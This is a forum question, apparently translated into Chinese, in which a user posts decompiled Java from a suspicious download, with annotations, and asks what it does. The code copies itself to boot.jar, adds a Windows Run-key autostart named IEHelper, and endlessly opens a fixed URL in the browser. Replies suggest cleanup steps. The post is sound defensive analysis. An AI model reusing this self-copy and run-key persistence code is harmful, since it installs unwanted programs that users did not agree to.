我下載了某類文件後觀察到怪異行爲,反編譯後發現了這段代碼 - 程序代碼的理解 [JAVA]
package w1Comlu;
import java.awt.Desktop;
import java.io.File;
import java.io.IOException;
import java.lang.reflect.InvocationTargetException;
import java.net.URI;
import java.net.URL;
import java.nio.file.CopyOption;
import java.nio.file.Files;
import java.nio.file.Path;
import java.security.CodeSource;
import java.security.ProtectionDomain;
import java.util.Random;
import w1Comlu.WinRegistry;
/**
 * Decompiled entry point of the sample discussed on this page.
 *
 * <p>Read top to bottom, {@code main} does three things:
 * <ol>
 *   <li>copies the JAR it is running from to {@code boot.jar} in the current working
 *       directory ({@code user.dir});</li>
 *   <li>asks the project helper {@code WinRegistry} to write a value named
 *       {@code IEHelper} under {@code Software\Microsoft\Windows\CurrentVersion\Run},
 *       a key Windows reads to start programs at logon (registry run-key persistence,
 *       MITRE ATT&amp;CK T1547.001);</li>
 *   <li>loops forever, opening {@code http://w1.comlu.com/} in the default browser and
 *       sleeping a random interval between attempts.</li>
 * </ol>
 *
 * <p>Artifacts a responder can look for, all taken from the literals below: a file named
 * {@code boot.jar} in whichever directory the JAR was launched from, a {@code Run} value
 * named {@code IEHelper} whose data starts with {@code javaw -jar}, and repeated browser
 * navigation to {@code w1.comlu.com}. Deleting {@code boot.jar} alone leaves the
 * {@code IEHelper} value in place.
 */
public class Main {
    /**
     * Installs the copy and the autostart value on first run, then opens the URL in a loop.
     *
     * @param args command-line arguments; never read
     */
    public static void main(String[] args) {
        // Path of the JAR (or class directory) this class was loaded from.
        File file = new File(Main.class.getProtectionDomain().getCodeSource().getLocation().getPath());
        // Destination is relative to the working directory at launch, so the copy can land in
        // different folders depending on where the sample was started.
        File newFile = new File(System.getProperty("user.dir"), "boot.jar");
        // First-run branch: everything inside runs only while boot.jar is absent from user.dir.
        if (!newFile.exists()) {
            try {
                // Self-copy; no REPLACE_EXISTING option is passed (empty CopyOption array).
                Files.copy(file.toPath(), newFile.toPath(), new CopyOption[0]);
                // Registry data: the whole command, including the path, is wrapped in one pair
                // of double quotes.
                String value = "\"javaw -jar " + System.getProperty("user.dir") + "\\boot.jar\"";
                try {
                    // -2147483647 is 0x80000001 as a signed int, the predefined handle for
                    // HKEY_CURRENT_USER, so the value is per-user and needs no admin rights.
                    // WinRegistry is not shown on this page; presumably a reflection-based
                    // registry wrapper, given the exception types caught below.
                    WinRegistry.writeStringValue((int)-2147483647, (String)"Software\\Microsoft\\Windows\\CurrentVersion\\Run", (String)"IEHelper", (String)value);
                }
                catch (IllegalArgumentException e) {
                    e.printStackTrace();
                }
                catch (IllegalAccessException e) {
                    e.printStackTrace();
                }
                catch (InvocationTargetException e) {
                    e.printStackTrace();
                }
            }
            catch (IOException e1) {
                // A failed copy also skips the registry write; execution still continues.
                e1.printStackTrace();
            }
            try {
                // 600000 ms = 10 minutes of inactivity before the first browser launch,
                // which separates the visible symptom from the moment the file was opened.
                Thread.sleep(600000);
            }
            catch (InterruptedException e1) {
                e1.printStackTrace();
            }
        }
        // Hard-coded destination; plain HTTP.
        String url = "http://w1.comlu.com/";
        Desktop desktop = Desktop.isDesktopSupported() ? Desktop.getDesktop() : null;
        // Endless loop: one browse attempt per iteration, then a random pause.
        do {
            boolean worked = false;
            if (desktop != null && desktop.isSupported(Desktop.Action.BROWSE)) {
                try {
                    // Opens the URL in the user's default browser.
                    desktop.browse(new URI(url));
                    worked = true;
                }
                catch (Exception e) {
                    e.printStackTrace();
                }
            }
            if (!worked) {
                // The builder is constructed and discarded; this listing contains no call that
                // launches it, so no "x-www-browser" child process results from this line.
                new java.lang.ProcessBuilder("x-www-browser", url);
            }
            try {
                // nextInt(600) yields 0..599, so the pause is 0 to 599 seconds.
                Thread.sleep(new Random().nextInt(600) * 1000);
                continue;
            }
            catch (InterruptedException e) {
                e.printStackTrace();
                continue;
            }
            // Never reached: both paths above end in continue (likely a decompiler artifact).
            break;
        } while (true);
    }
}
我只能看懂一點代碼,因爲我是 Java 新手。有人可以詳細說明這段代碼試圖做什麼嗎?
我已經刪除了 boot.jar 文件,接下來該怎麼辦? :D –
@Ashsh Sharma,另外請在所有用戶目錄中搜索 boot.jar 並刪除找到的文件。也建議檢查 Windows 註冊表,如果發現該程序寫入的條目,就將其刪除。 – Berger
有什麼建議嗎?我應該檢查註冊表中的哪個位置? –